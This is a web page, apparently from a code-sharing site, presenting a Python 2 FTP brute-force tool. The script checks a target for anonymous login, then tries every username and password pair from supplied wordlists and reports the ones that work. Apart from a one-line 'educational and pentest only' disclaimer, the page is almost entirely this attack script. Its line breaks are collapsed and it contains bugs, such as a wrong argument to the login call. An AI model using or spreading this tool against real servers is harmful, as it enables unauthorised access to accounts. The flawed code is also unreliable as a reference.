Python FTP暴力破解工具,pythonftp暴力破解,[Python]代码#!


#!/usr/bin/env python#-*-coding = utf-8-* sys, os, time   from ftplib import FTPdocs = """    [*] This was written for educational purpose and pentest only. Use it at your own risk.    [*] Author will be not responsible for any damage!    [*] Toolname        :    [*] Coder           :     [*] Version         : 0.1    [*] ample of use  : python -t -u usernames.txt -p passwords.txt    """if sys.platform == 'linux' or sys.platform == 'linux2':    clearing = 'clear'else:    clearing = 'cls'os.system(clearing)R = "\033[31m";G = "\033[32m";Y = "\033[33m"END = "\033[0m"def logo():    print G+"\n           |---------------------------------------------------------------|"        print "     |                                                               |"        print "     |                    |"        print "     |            08/05/2012 v.0.1                     |"        print "     |          FTP Brute Forcing Tool                       |"        print "     |                                                               |"        print "     |---------------------------------------------------------------|\n"    print " \n      [-] %s\n" % time.strftime("%X")    print docs+ENDdef help():        print R+"[*]-t, --target            ip/hostname     <> Our target"    print "[*]-u, --usernamelist      usernamelist    <> usernamelist path"    print "[*]-p, --passwordlist      passwordlist    <> passwordlist path"    print "[*]-h, --help              help            <> print this help"    print "[*]Example : python ftp_bf -t -u username.txt -p passwords.txt"+END    sys.exit(1)def bf_login(hostname,username,password):#   sys.stdout.write("\r[!]Checking : %s " % (p))#   sys.stdout.flush()    try:        ftp = FTP(hostname)        ftp.login(hostname,username, password)        ftp.retrlines('list')        ftp.quit()        print Y+"\n[!] w00t,w00t!!! We did it ! "        print "[+] Target : ",hostname, ""        print "[+] User : ",username, ""        print "[+] Password : ",password, ""+END        return 1#       sys.exit(1)    except Exception, e:        pass    except KeyboardInterrupt:        print R+"\n[-] Exiting ...\n"+END        sys.exit(1)def anon_login(hostname):    try:        print G+"\n[!] Checking for anonymous login.\n"+END        ftp = FTP(hostname)        ftp.login()        ftp.retrlines('LIST')        print Y+"\n[!] w00t,w00t!!! Anonymous login successfuly !\n"+END        ftp.quit()    except Exception, e:        print R+"\n[-] Anonymous login failed...\n"+END        passdef main():    logo()    try:        for arg in sys.argv:            if arg.lower() == '-t' or arg.lower() == '--target':                hostname = sys.argv[int(sys.argv[1:].index(arg))+2]            elif arg.lower() == '-u' or arg.lower() == '--usernamelist':                usernamelist = sys.argv[int(sys.argv[1:].index(arg))+2]            elif arg.lower() == '-p' or arg.lower() == '--passwordlist':                passwordlist = sys.argv[int(sys.argv[1:].index(arg))+2]            elif arg.lower() == '-h' or arg.lower() == '--help':                help()            elif len(sys.argv) <= 1:                help()    except:        print R+"[-]Cheak your parametars input\n"+END        help()    print G+"[!] BruteForcing target ..."+END    anon_login(hostname)#   print "here is ok"#   print hostname    try:            usernames = open(usernamelist, "r")        user = usernames.readlines()        count1 = 0        while count1 < len(user):            user[count1] = user[count1].strip()            count1 +=1    except:         print R+"\n[-] Cheak your usernamelist path\n"+END        sys.exit(1)#   print "here is ok ",usernamelist,passwordlist    try:        passwords = open(passwordlist, "r")        pwd = passwords.readlines()        count2 = 0        while count2 < len(pwd):            pwd[count2] = pwd[count2].strip()            count2 +=1    except:        print R+"\n[-] Check your passwordlist path\n"+END        sys.exit(1)    print G+"\n[+] Loaded:",len(user),"usernames"    print "\n[+] Loaded:",len(pwd),"passwords"    print "[+] Target:",hostname    print "[+] Guessing...\n"+END    for u in user:        for p in pwd:            result = bf_login(hostname,u.replace("\n",""),p.replace("\n",""))            if result != 1:                print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + R+"Disenable"+END            else:                print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + Y+"Enable"+END    if not result :        print R+"\n[-]There is no username ans password enabled in the list."        print "[-]Exiting...\n"+ENDif __name__ == "__main__":    main()
